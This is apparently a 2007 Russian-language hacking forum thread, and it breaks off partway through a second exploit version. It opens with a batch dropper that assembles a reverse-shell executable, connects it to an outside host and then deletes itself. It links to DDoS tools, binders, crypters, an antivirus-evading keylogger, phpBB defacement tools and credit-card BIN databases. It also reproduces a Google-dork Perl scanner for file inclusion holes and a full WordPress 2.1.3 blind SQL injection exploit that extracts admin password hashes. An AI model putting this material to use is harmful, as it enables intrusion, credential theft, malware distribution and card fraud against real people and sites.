echo e 0380 >>123.hex && echo 3a 7a 6f 48 15 ea 4c 05 11 50 64 90 10 4d 44 55 91 14 3c 40 78 6a 28 10 68 5d 28 ff 35 30 74 e8 a4 9e 51 54 55 a1 55 8d bf 6e 0e 0a 08 90 22 0b e1 51 14 e8 1f 81 4b c3 ff 25 24 20 bb 6f 2a 1c 06 43 18 21 14 bd c3 22 08 71 cc 01 55 8b ec 81 c4 7c fe ff 88 56 57 e8 60 ac dd 89 45 fc 33 1d c9 8b 75 7e 38 3c 1d 74 07 1e 22 40 f7 41 eb f4 51 d1 72 e9 00 e1 58 3b c1 74 0b 5f 5e 30 b8 03 >>123.hex
echo e 0400 >>123.hex && echo b9 c9 c2 08 e1 86 49 8d bd 3c 70 e5 43 2a 09 cf 2f e0 02 b0 20 aa eb 73 f2 28 8d 85 15 39 8b f0 36 f8 33 2a 33 eb 1b 8b 03 66 32 07 ef 22 65 20 4d fe 22 11 e1 28 2d ed 94 08 83 b9 dc b7 30 4b 74 fb 3b 3a 4d 08 a8 15 59 65 1d 67 0a 4c 13 41 1d 0f 14 eb e6 aa 0d 36 07 19 87 38 f4 b0 7f c0 55 73 11 8b 7d 0c c6 17 b8 02 7f 82 a2 13 9d 68 b0 a0 58 34 33 0d 46 0d e6 d1 f7 e1 fe 58 a3 ee >>123.hex
echo e 0480 >>123.hex && echo e7 44 bb 1f 16 a9 ce 11 04 de 55 01 3c d4 14 d4 0e 1b 33 c0 4e ec 87 0b 70 d2 8a 06 46 3d 3c 02 b3 12 0e f7 df 90 eb 0b 2c 30 19 8d 0c 89 06 48 83 2d 0a c0 75 f1 e8 04 11 33 51 c2 38 e2 30 83 c4 07 f4 6a f5 e8 69 09 19 49 ff bd 82 aa 20 0b d0 2a 93 75 37 f8 50 22 9d 29 86 06 fc e8 4d 2f 68 8b 24 38 e6 53 1a 0f 08 8d 50 03 21 18 83 c0 04 e3 f9 ff fe 80 02 f7 d3 23 cb 81 e1 44 80 74 >>123.hex
echo e 0500 >>123.hex && echo 7c e9 6c c1 0c 60 75 77 06 f4 10 c0 40 02 d0 e1 1b c2 51 5b 3a 47 c4 49 19 ca 0c 57 06 08 30 00 00 30 40 00 63 30 6d 64 00 66 3f 40 00 14 38 20 40 03 77 73 32 5f 33 98 2e 64 6c e3 c0 80 67 07 65 74 68 6f 73 40 62 79 6e 61 7b 6d cf 1e 63 9e 3c f7 eb ff 0e 12 57 53 41 5d cf 61 72 46 75 70 18 79 68 ca 2c 73 13 4f 26 63 6b 62 ef c1 ff b8 03 6c 95 1a 72 ca 5e 6c 4c c7 57 d3 69 74 f3 46 >>123.hex
echo e 0580 >>123.hex && echo a7 bc 91 47 c3 4c 43 6f 6d 88 61 6e 64 36 4c 69 44 62 7e 80 76 72 fb 9d 3a 50 b7 82 e7 73 15 41 58 21 c0 64 48 d0 43 2f 60 00 00 00 00 00 66 3f 40 00 4c 6f 61 64 4c 69 62 72 61 72 79 41 00 47 65 74 50 72 6f 63 41 64 64 72 65 73 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 40 00 00 e9 74 be ff ff 00 00 00 02 00 00 00 0c 40 00 00 >>123.hex
echo r cx >>123.hex && echo 04ef >>123.hex && echo w >>123.hex && echo q >>123.hex && debug<123.hex && copy 1.dll reverse.exe && del 1.dll && del 123.hex
rem *******************EDIT YOUR HOSTNAME AND PORT HERE*************************
reverse.exe illwill.reverse-dns.com 8080
deleteit:
del reverse.exe
IF EXIST reverse.exe GOTO kill
del %0
Автор: Creeping Death 10.05.2007, 16:27
Acunetix Web Vulnerability Scanner
Acunetix Web Vulnerability Scanner automatically detects the following vulnerabilities in web applications:
· Cross site scripting
· SQL injection
· CRLF injection
· Code execution
· Directory traversal
· File inclusion
· Script source code disclosure
· Discovers files/directories that may contain sensitive information
· Looks for common files (such as logs, application traces, CVS web repositories), back-up files or directories
· Finds directory listings
· Discovers directories with weak permissions
· Discovers available web server technologies (such as WebDAV, FrontPage, etc.)
· Determines if dangerous HTTP methods are enabled on the web server (e.g. PUT, TRACE, DELETE)
· Inspects the HTTP version banners and looks for vulnerable products
· Tests password strength of applications.
Extend attacks
· With Acunetix Web Vulnerability Scanner, you can construct HTTP/HTTPS requests and analyze the responses using the HTTP editor.
Connection spy
· By enabling you to log, intercept and modify all HTTP/HTTPS traffic, Acunetix Web Vulnerability Scanner gives you an in-depth insight into what data your web application is sending.
Test password strength
· To test the strength of your passwords, you can perform a dictionary attack on basic HTTP, NTLM or form-based authentication.
Test database editor
· Acunetix Web Vulnerability Scanner includes a text database editor that permits you to add additional attacks to the test database (Enterprise & Consultant versions only).
Supports all major web technologies
· Applications utilizing CGI, PHP, ASP, ASP.NET can all be tested for vulnerabilities.
Scanning profiles
· Acunetix Web Vulnerability Scanner allows you to quickly scan sites with different options and identities.
Reporting
· You can save scan sessions to MS SQL Server/Access databases and generate complex reports from previous scan sessions using information stored in the database.
Requirements:
· 128 MB of RAM (256MB or higher recommended)
· 200 MB of available hard-disk space
· Microsoft Internet Explorer 5.1 (or higher)
· Microsoft SQL Server / Access if database is enabled (optional)
Limitations:
· 30 day trial
· The evaluation version is identical to the full version, however you will only be able to scan the Acunetix test websites add you will not be able to save the scan results
http://www.acunetix.com/vulnerability-scanner/wvs_sb_trial_4.exe
Автор: Creeping Death 10.05.2007, 17:29
PacketCreator 1.1
PacketCreator is provided to help network administrators to test their network, by using ARP cache poisoning, and generate ICMP packets to send over the LAN.
The main idea is to allow administrators using these kind of software to secure their network to several known attacks.
This tool can also redirect switched based networks traffic (dumping and forwarding is also provided).
It is possible to create a own made IP packet in which you can edit IP header or every ICMP field.
http://download.softpedia.ro/dl/d2418d478ba628c054d9a6c1406679f3/46432a11/100069721/software/NETWORK/PacketCreator_v1.1_Setup.exe
DoSHTTP 1.0
DoSHTTP is an easy to use and powerful HTTP Flood Denial of Service (DoS) Testing Software for Windows. DoSHTTP includes URL Verification, HTTP Redirection and performance monitoring.
DoSHTTP uses multiple asynchronous sockets to perform an effective HTTP Flood. DoSHTTP can be used simultaneously on multiple clients to emulate a Distributed Denial of Service (DDoS) attack.
DoSHTTP can help IT Professionals test web server performance and evaluate web server protection software. DoSHTTP was developed by certified IT Security and Software Development professionals.
Here are some key features of "DoSHTTP":
· Easy to use and powerful HTTP Flood Denial of Service (DoS) Testing Tool
· Uses multiple asynchronous sockets to perform an effective HTTP Flood
· Allows multiple simultaneous clients to emulate a Distributed Denial of Service (DDoS) Attack
· Supports HTTP Redirection for automatic page redirection (optional)
· Includes URL Verification that displays the response header and document
· Includes Performance Monitoring to track requests issued and responses received
· Allows customized User Agent header fields
· Allows user defined Socket and Request settings
· Supports numeric addressing for Target URLs
· Includes a comprehensive User Guide
Requirements:
· DoSHTTP must be used with an administrative account.
Limitations:
· Free 14-Day Trial
http://www.socketsoft.net/download/doshttp10_setup.exe
Nsauditor Network Security Auditor 1.6
Nsauditor reveals a variety of information, including installed software, users, shares, hotfixes, NetBios, drives, RPC, SQL and SNMP information, open ports.
Nsauditor Network Security Auditor is a network security scanner that allows to audit and monitor remote network computers for possible vulnerabilities, checks your network for all potential methods that a hacker might use to attack it.
Nsauditor is a complete networking utilities package that includes a wide range of tools for network auditing, scanning, monitoring and more.
You can discover network services and check them for vulnerabilities, list all TCP and UDP endpoints with their associated process, discover NetBios names, audit MS SQL servers, scan for common Adware traces and more.
The program also includes real-time network packet filtering and analyzing, remote network performance monitoring, network status monitoring, web proxy scanning, password auditing, intrusion detection system based on security events log analyzer and firewall system that allows to stop internet threats and block unwanted network connections, IP address lookup and more than 45 network tools for scanning, sniffing, enumerating and gaining access to machines, DNS and WHOIS lookups, e-mail validation and HTTP traffic generator.
The product contains a built-in database of known network security vulnerabilities, which allows you to select the items for scanning and add custom entries. Nsauditor can reveal and catalog a variety of information, including installed software, shares, users, drives, hotfixes, NetBios, RPC, SQL and SNMP information, open ports.
Nsauditor Network Security Auditor can also audit password and security policies as well as make a variety of network attack probes, such as stealth port scans, HTTP / CGI server auditing, registry auditing.
Nsauditor Network Security Auditor can sniff and use brute-force and dictionary attacks on LM and NTLM password hashes and expose the insecure ones.
Nsauditor does OS detection and automatically creates OS fingerprints which are not included in database. Reports can be generated in HTML and XML format.
http://www.nsauditor.com/downloads/nsauditor_setup.exe
Автор: Creeping Death 15.05.2007, 16:27
SQL Bruter by Raz0r
http://www.inattack.ru/download.php?id=358
Автор: Creeping Death 15.05.2007, 22:25
Приватный скрипт от Security-Teams.Net Crew для автоматизированного поиска уязвимостей в CGI-скриптах с помощью google. нашелся в паблике.
CODE
#! /usr/bin/perl
# ================================================================ #
# google-php-include-bugs searcher v 0.8 #
# ©oded by drmist\STNC #
# www.security-teams.net #
# #
# ATTENTION. THIS SCRIPT IS PRIVATE. #
# ONLY FOR STNC AND FRIENDS. NOT FOR SALE. #
# #
# Usage: perl script.pl --log=<log-file> --url=<test-script-url> #
# Test script: #
# <?php #
# error_reporting(0); #
# $s = md5("STNC"); #
# $code = eregi("windows", php_uname())+ #
# 2*eregi("apache", getenv("SERVER_SOFTWARE"))+ #
# 4*ini_get('safe_mode'); echo $s."[$code]".$s; #
# ?> #
# ================================================================ #
use IO::Socket;
@inc_bugs = ("page", "text", "print", "html", "url", "view", "show", "body", "cat",
"inc", "incl", "include", "read", "write", "data", "code", "fname",
"filename", "cont", "content", "menu", "open", "file", "id", "p", "f",
"seite", "pagina", "vista", "vue", "visao", "datei", "offnen", "corpo",
"corps", "ouvrir", "fichier", "abrir", "fichero", "inhalt", "contenu",
"conteudo");
@zones = ("com", "net", "org", "de", "fr", "uk", "br", "am",
"info", "name", "aero", "biz", "edu", "ws", "in",
"cn", "us", "be", "it", "cc", "tv", "ru", "su",
"jp", "kz", "se", "is", "ca", "gs", "ms", "vg",
"be", "fi", "gov");
@ftypes = ("php", "php3");
$boundary = "ca73bad132fa0c99fe9ce9efe9029e21"; # md5("STNC");
for($i = 0; $i < @ARGV; $i++)
{
if($ARGV[$i] =~ /^--log=(.*)$/) { $log = $1; }
elsif($ARGV[$i] =~ /^--url=(.*)$/) {$script = $1; }
}
if(!($script && $log)){ usage(); exit; }
foreach $inc(@inc_bugs)
{
foreach $zone(@zones)
{
foreach $ftype(@ftypes)
{
$request = "filetype:$ftype site:$zone inurl:$inc=";
print "\n[$request]\n";
$request =~ s/(.)/sprintf("%%%02x",ord($1))/eg;
@dn = ();
for($i = 0;$i < 10; $i++)
{
@temp = get("http://www.google.com/search?filter=0&num=100&start=".$i.
"00&q=$request") =~ /(http\:\/\/[a-z0-9\.\-\/\?\:\&\%\=\_]{5,})/gi;
foreach $url (@temp)
{
if($url !~ /($inc=[^\&]+)/i) { next; }
$left = $`; $right = $';
if($url =~ /https?\:\/\/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\/search\?q=cache:/i){ next; }
if($url =~ /google\.com/i){ next; }
($domain) = $url =~ /^http\:\/\/([a-z0-9\.\-]{5,})/;
if($domain =~ /^www\.(.+)$/) { $domain = $1; }
$f=0;foreach(@dn){if($_ eq $domain){$f++;last;}}if($f){next;}
push @dn, $domain;
$print = "$left$inc=[INCLUDE]$right";
if(($data) = get("$left$inc=$script\?$right") =~ /$boundary\[([0-9]+)\]$boundary/i)
{
$s = "$print - ".(($data % 2) ? "WINDOWS" : "UNIX").(($data > 3) ? ", SAFE_MODE" : "")."\n";
$count++;
print "[$count] $s";
open LOG, ">>$log";
print LOG $s;
close LOG;
}
else {
print "$print - no bugs\n";
}
}
}
}
}
}
sub timeout() { close $sock; }
sub get()
{
local $request = $_[0];
local $port = 80;
local $data = "";
if(local($server, $url) = $request =~ /^http\:\/\/([^\/]+)\/(.+)$/)
{
if($server =~ /^([^\:]+)\:([0-9]{2,5})$/){ $server = $1; $port = $2; }
$sock = IO::Socket::INET->new(
PeerAddr => $server,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM,
TimeOut => $timeout
) or return 0; # connection failed
print $sock "GET /$url HTTP/1.0\r\nHost: $server\r\n\r\n";
$SIG{ALRM} = \&timeout; alarm 10;
while(<$sock>){ $data .= $_; }
alarm 0; close $sock;
}
return $data;
}
sub usage()
{
print qq(Usage: perl $0 --log=<log-file> --url=<url-of-test-script-source>
Test script:
<?php
error_reporting(0);
\$s = md5("STNC");
\$code = eregi("windows", php_uname())+
2*eregi("apache", getenv("SERVER_SOFTWARE"))+
4*ini_get('safe_mode'); echo \$s."[\$code]".\$s;
?>
);
}
Thx to Gradiz
Автор: Creeping Death 16.05.2007, 08:19
CC2Bank 1.3
Описание: Эта программа поможет вам получить дополнительную информацию о банке сделавшем кредитную карточку.
http://soft.verified.ru/files/databases/cc2bank/cc2bank_1.3/cc2bank13.rar
http://soft.verified.ru/files/databases/cc2bank/cc2bank_1.3/hash.txt
CC2Bank ListGenerator 1.0
Описание: Прога ищет в текстовом фале номера кредитных каточек и подбирая к номеру информацию о банке выводит в список. Потом данные можно сортировать на своё усмотрение и сохранять в отдельный файл.
http://soft.verified.ru/files/databases/cc2bank_listgenerator/cc2bank_listgenerator_1.0/cc2banklg10.rar
http://soft.verified.ru/files/databases/cc2bank_listgenerator/cc2bank_listgenerator_1.0/hash.txt
Mars Banks Base 1.1
Описание: База данных по банкам. Содержит 11 баз: ABA номера банков США, routing номера банков США, БИНы кредитных карт для VISA, MasterCard, American Express, ZIP коды США, занятые телефоны США, регионы SSN, телефонные коды США, штаты США, штаты UK. Поддерживает поиск и фильтрацию, скины...
http://soft.verified.ru/files/databases/mars_banks_base/mars_banks_base_1.1/marsbanksbase11.exe
http://soft.verified.ru/files/databases/mars_banks_base/mars_banks_base_1.1/hash.txt
Zip Express 2.4b
Описание: Zip Express позволяет вам производить поиск по zip, городу, стране или штату.
http://soft.verified.ru/files/databases/zipexpress/zipexpress_2.4/zpex.zip
http://soft.verified.ru/files/databases/zipexpress/zipexpress_2.4/crack.rar
http://soft.verified.ru/files/databases/zipexpress/zipexpress_2.4/hash.txt
Автор: Gener 16.05.2007, 17:14
BE Joiner
Представляю свою [автор программы - begin end] версию программы класса джоинеров - BEJoiner. Она полностью бесплатна.Характеристика и возможности:
-упаковка неограниченного числа файлов;
-смена иконки на любую из *.ico файла;
-компрессия пакером (UPack);
-малый размер стаба (в чистом виде 1,4 кбайт);
-на 12.05.2007 в плане проверки антивирусами полностью чист.
Просьба не распростанять эту программу дальше этого форума.
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как наберете 100 сообщений.
Автор: Creeping Death 22.05.2007, 19:37
PRIAMOS - SQL Injector & Scanner
http://rapidshare.com/files/32528869/PRIAMOS.v1.0.zip
Pretator v1.6 - BINDER
http://rapidshare.com/files/32528311/Pretator_v1.6.rar
Redbinder2.0.1
http://rapidshare.com/files/32312064/Redbinder_v_2.0.1.rar
Aase Binder/Packer/Crypter
Language: delphi
Description: bind as many files as you like make them all undetected
run binded files in memory/ extract them to file run hidden/visible
with parameters. server supports many parameters. choose output icon.
save & reload projects.
http://rapidshare.com/files/32263540/aase.rar
AIO - phpBB Tools
Includes:
+ phpBB Annihilator
+ phpBB Defacer
+ UC Forum Spam
+ phpBB Extractor
+ phpBB Spammer
+ phpBB Attacker
+ Bonus: Collection of phpBB exploits
http://rapidshare.com/files/32245240/aio_phpbb2_tools.rar
AntiDote v1.2
antidote 1.2 osce compress and scrambles servers and trojans in order to make them undetected.
http://rapidshare.com/files/32244567/AntiDote_v1.2_osCE.rar
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как наберете 100 сообщений.
Автор: Creeping Death 22.05.2007, 22:45
avkhack keylogger
» Нажмите тут чтобы открыть/скрыть спойлер. «
Antivirus Result
AhnLab-V3 no virus found
AntiVir no virus found
Authentium no virus found
Avast no virus found
AVG no virus found
BitDefender no virus found
CAT-QuickHeal no virus found
ClamAV no virus found
DrWeb no virus found
eSafe no virus found
eTrust-Vet no virus found
Ewido no virus found
FileAdvisor no virus found
Fortinet no virus found
F-Prot no virus found
F-Secure no virus found
Ikarus no virus found
Kaspersky no virus found
McAfee no virus found
Microsoft no virus found
NOD32v2 probably a variant ofWin32/Spy.VB.Qd
Norman no virus found
Panda no virus found
Prevx1 no virus found
Sophos no virus found
Sunbelt no virus found
Symantec no virus found
TheHacker no virus found
http://rapidshare.com/files/32185028/avkhackteamkeyloggerzip.zip
erzip.zip]download[/url]
Автор: Creeping Death 24.05.2007, 18:06
Wordpress 2.1.3 admin-ajax.php SQL Injection Blind Fishing Exploit
CODE
<?php
error_reporting(E_ALL);
$norm_delay = 0;
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// WordPress 2.1.3 "admin-ajax.php" sql injection blind fishing exploit
// written by Janek Vind "waraxe"
// http://www.waraxe.us/
// 21. may 2007
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$outfile = './warlog.txt';// Log file
$url = 'http://localhost/wordpress.2.1.3/wp-admin/admin-ajax.php';
$testcnt = 300000;// Use bigger numbers, if server is slow, default is 300000
$id = 1;// ID of the target user, default value "1" is admin's ID
$suffix = '';// Override value, if needed
$prefix = 'wp_';// WordPress table prefix, default is "wp_"
//======================================================================
echo "Target: $url
";
echo "sql table prefix: $prefix
";
if(empty($suffix))
{
$suffix = md5(substr($url, 0, strlen($url) - 24));
}
echo "cookie suffix: $suffix
";
echo "testing probe delays
";
$norm_delay = get_normdelay($testcnt);
echo "normal delay: $norm_delay deciseconds
";
$hash = get_hash();
add_line("Target: $url");
add_line("User ID: $id");
add_line("Hash: $hash");
echo "
Work finished
";
echo "Questions and feedback - http://www.waraxe.us/
";
die("See ya!
");
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
function get_hash()
{
$len = 32;
$field = 'user_pass';
$out = '';
echo "finding hash now ...
";
for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_hashchar($field,$i);
echo "got $field pos $i --> $ch
";
$out .= "$ch";
echo "current value for $field: $out
";
}
echo "
Final result: $field=$out
";
return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($field,$pos)
{
global $prefix, $suffix, $id, $testcnt;
$char = '';
$cnt = $testcnt * 4;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = " UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,MD5(1337)),3)/*";
// First let's determine, if it's number or letter
$inj = sprintf($ipattern, $prefix, $id, ">57");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$letter = test_condition($post);
if($letter)
{
$min = 97;
$max = 102;
echo "char to find is [a-f]
";
}
else
{
$min = 48;
$max = 57;
echo "char to find is [0-9]
";
}
$curr = 0;
while(1)
{
$area = $max - $min;
if($area < 2 )
{
$inj = sprintf($ipattern, $prefix, $id, "=$max");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$eq = test_condition($post);
if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}
break;
}
$half = intval(floor($area / 2));
$curr = $min + $half;
$inj = sprintf($ipattern, $prefix, $id, ">$curr");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$bigger = test_condition($post);
if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}
echo "curr: $curr--$max--$min
";
}
return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
global $url, $norm_delay;
$bret = false;
$maxtry = 10;
$try = 1;
while(1)
{
$start = getmicrotime();
$buff = make_post($url, $p);
$end = getmicrotime();
if($buff === '-1')
{
break;
}
else
{
echo "test_condition() - try $try - invalid return value ...
";
$try ++;
if($try > $maxtry)
{
die("too many tries - exiting ...
");
}
else
{
echo "trying again - try $try ...
";
}
}
}
$diff = $end - $start;
$delay = intval($diff * 10);
if($delay > ($norm_delay * 2))
{
$bret = true;
}
return $bret;
}
///////////////////////////////////////////////////////////////////////
function get_normdelay($testcnt)
{
$fa = test_md5delay(1);
echo "$fa
";
$sa = test_md5delay($testcnt);
echo "$sa
";
$fb = test_md5delay(1);
echo "$fb
";
$sb = test_md5delay($testcnt);
echo "$sb
";
$fc = test_md5delay(1);
echo "$fc
";
$sc = test_md5delay($testcnt);
echo "$sc
";
$mean_nondelayed = intval(($fa + $fb + $fc) / 3);
echo "mean nondelayed - $mean_nondelayed dsecs
";
$mean_delayed = intval(($sa + $sb + $sc) / 3);
echo "mean delayed - $mean_delayed dsecs
";
return $mean_delayed;
}
///////////////////////////////////////////////////////////////////////
function test_md5delay($cnt)
{
global $url, $id, $prefix, $suffix;
// delay in deciseconds
$delay = -1;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = ' UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(LENGTH(user_pass)>31,BENCHMARK(%d,MD5(1337)),3)/*';
$inj = sprintf($ipattern, $prefix, $id, $cnt);
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$start = getmicrotime();
$buff = make_post($url, $post);
$end = getmicrotime();
if(intval($buff) !== -1)
{
die("test_md5delay($cnt) - invalid return value, exiting ...");
}
$diff = $end - $start;
$delay = intval($diff * 10);
return $delay;
}
///////////////////////////////////////////////////////////////////////
function getmicrotime()
{
list($usec, $sec) = explode(" ", microtime());
return ((float)$usec + (float)$sec);
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
{
$ch = curl_init();
$timeout = 120;
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)');
if(!empty($cookie))
{
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
}
if(!empty($referer))
{
curl_setopt ($ch, CURLOPT_REFERER, $referer);
}
if($headers === TRUE)
{
curl_setopt ($ch, CURLOPT_HEADER, TRUE);
}
else
{
curl_setopt ($ch, CURLOPT_HEADER, FALSE);
}
$fc = curl_exec($ch);
curl_close($ch);
return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($buf)
{
global $outfile;
$buf .= "
";
$fh = fopen($outfile, 'ab');
fwrite($fh, $buf);
fclose($fh);
}
///////////////////////////////////////////////////////////////////////
?>
ver. 2CODE
<?php
error_reporting(E_ALL);
$norm_delay = 0;
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// WordPress 2.1.3 "admin-ajax.php" sql injection blind fishing exploit
// written by Janek Vind "waraxe"
// http://www.waraxe.us/
// original version released - 21. may 2007
// added login retrieving - 23. may 2007
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$outfile = './warlog.txt';// Log file
$url = 'http://localhost/wordpress.2.1.3/wp-admin/admin-ajax.php';
$testcnt = 300000;// Use bigger numbers, if server is slow, default is 300000
$id = 1;// ID of the target user, default value "1" is admin's ID
$suffix = '';// Override value, if needed
$prefix = 'wp_';// WordPress table prefix, default is "wp_"
$get_hash = true;// md5 hash retrieving - true or false
$get_login = true;// user login retrieving - true or false
//======================================================================
echo "
WordPress 2.1.3 blind sql injection exploit by waraxe
";
echo "Target: $url
";
echo "sql table prefix: $prefix
";
if(empty($suffix))
{
$suffix = md5(substr($url, 0, strlen($url) - 24));
}
echo "cookie suffix: $suffix
";
echo "testing probe delays
";
$norm_delay = get_normdelay($testcnt);
echo "normal delay: $norm_delay deciseconds
";
if($get_hash)
{
echo "trying to get md5 hash from target
";
$hash = get_hash();
}
if($get_login)
{
echo "trying to get user login from target
";
$login = get_login();
}
add_line("Target: $url");
add_line("User ID: $id");
if($get_login)
{
add_line("Login: $login");
}
if($get_hash)
{
add_line("Hash: $hash");
}
echo "
Work finished
";
echo "Questions and feedback - http://www.waraxe.us/
";
die("See ya!
");
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
function get_login()
{
$field = 'user_login';
$out = '';
echo "first we need user login length ...
";
$len = get_length($field, 60);
echo "user login length is $len chars
";
echo "finding user login now ...
";
for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_anychar($field,$i);
echo "got $field pos $i --> $ch
";
$out .= "$ch";
echo "current value for $field: $out
";
}
echo "
Final result: $field=$out
";
return $out;
}
///////////////////////////////////////////////////////////////////////
function get_length($field, $maxlen = 60)
{
global $prefix, $suffix, $id, $testcnt;
$len = 0;
$cnt = $testcnt * 4;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = " UNION ALL SELECT 1,2,$field,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(LENGTH($field)%s,BENCHMARK($cnt,MD5(1337)),3)/*";
$min = 0;
$max = $maxlen;
echo "starting $field length retrieve
";
$curr = 0;
while(1)
{
$area = $max - $min;
if($area < 2 )
{
$inj = sprintf($ipattern, $prefix, $id, "=$max");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$eq = test_condition($post);
if($eq)
{
$len = $max;
}
else
{
$len = $min;
}
break;
}
$half = intval(floor($area / 2));
$curr = $min + $half;
$inj = sprintf($ipattern, $prefix, $id, ">$curr");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$bigger = test_condition($post);
if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}
echo "curr: $curr--$max--$min
";
}
return $len;
}
///////////////////////////////////////////////////////////////////////
function get_hash()
{
$len = 32;
$field = 'user_pass';
$out = '';
echo "finding hash now ...
";
for($i = 1; $i < $len + 1; $i ++)
{
$ch = get_hashchar($field,$i);
echo "got $field pos $i --> $ch
";
$out .= "$ch";
echo "current value for $field: $out
";
}
echo "
Final result: $field=$out
";
return $out;
}
///////////////////////////////////////////////////////////////////////
function get_anychar($field,$pos)
{
global $prefix, $suffix, $id, $testcnt;
$char = '';
$cnt = $testcnt * 4;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = " UNION ALL SELECT 1,2,$field,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,MD5(1337)),3)/*";
$min = 32;
$max = 255;
$curr = 0;
while(1)
{
$area = $max - $min;
if($area < 2 )
{
$inj = sprintf($ipattern, $prefix, $id, "=$max");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$eq = test_condition($post);
if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}
break;
}
$half = intval(floor($area / 2));
$curr = $min + $half;
$inj = sprintf($ipattern, $prefix, $id, ">$curr");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$bigger = test_condition($post);
if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}
echo "curr: $curr--$max--$min
";
}
return $char;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($field,$pos)
{
global $prefix, $suffix, $id, $testcnt;
$char = '';
$cnt = $testcnt * 4;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = " UNION ALL SELECT 1,2,$field,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,MD5(1337)),3)/*";
// First let's determine, if it's number or letter
$inj = sprintf($ipattern, $prefix, $id, ">57");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$letter = test_condition($post);
if($letter)
{
$min = 97;
$max = 102;
echo "char to find is [a-f]
";
}
else
{
$min = 48;
$max = 57;
echo "char to find is [0-9]
";
}
$curr = 0;
while(1)
{
$area = $max - $min;
if($area < 2 )
{
$inj = sprintf($ipattern, $prefix, $id, "=$max");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$eq = test_condition($post);
if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}
break;
}
$half = intval(floor($area / 2));
$curr = $min + $half;
$inj = sprintf($ipattern, $prefix, $id, ">$curr");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$bigger = test_condition($post);
if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}
echo "curr: $curr--$max--$min
";
}
return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
global $url, $norm_delay;
$bret = false;
$maxtry = 10;
$try = 1;
while(1)
{
$start = getmicrotime();
$buff = make_post($url, $p);
$end = getmicrotime();
if($buff === '-1')
{
break;
}
else
{
echo "test_condition() - try $try - invalid return value ...
";
$try ++;
if($try > $maxtry)
{
die("too many tries - exiting ...
");
}
else
{
echo "trying again - try $try ...
";
}
}
}
$diff = $end - $start;
$delay = intval($diff * 10);
if($delay > ($norm_delay * 2))
{
$bret = true;
}
return $bret;
}
///////////////////////////////////////////////////////////////////////
function get_normdelay($testcnt)
{
$fa = test_md5delay(1);
echo "$fa
";
$sa = test_md5delay($testcnt);
echo "$sa
";
$fb = test_md5delay(1);
echo "$fb
";
$sb = test_md5delay($testcnt);
echo "$sb
";
$fc = test_md5delay(1);
echo "$fc
";
$sc = test_md5delay($testcnt);
echo "$sc
";
$mean_nondelayed = intval(($fa + $fb + $fc) / 3);
echo "mean nondelayed - $mean_nondelayed dsecs
";
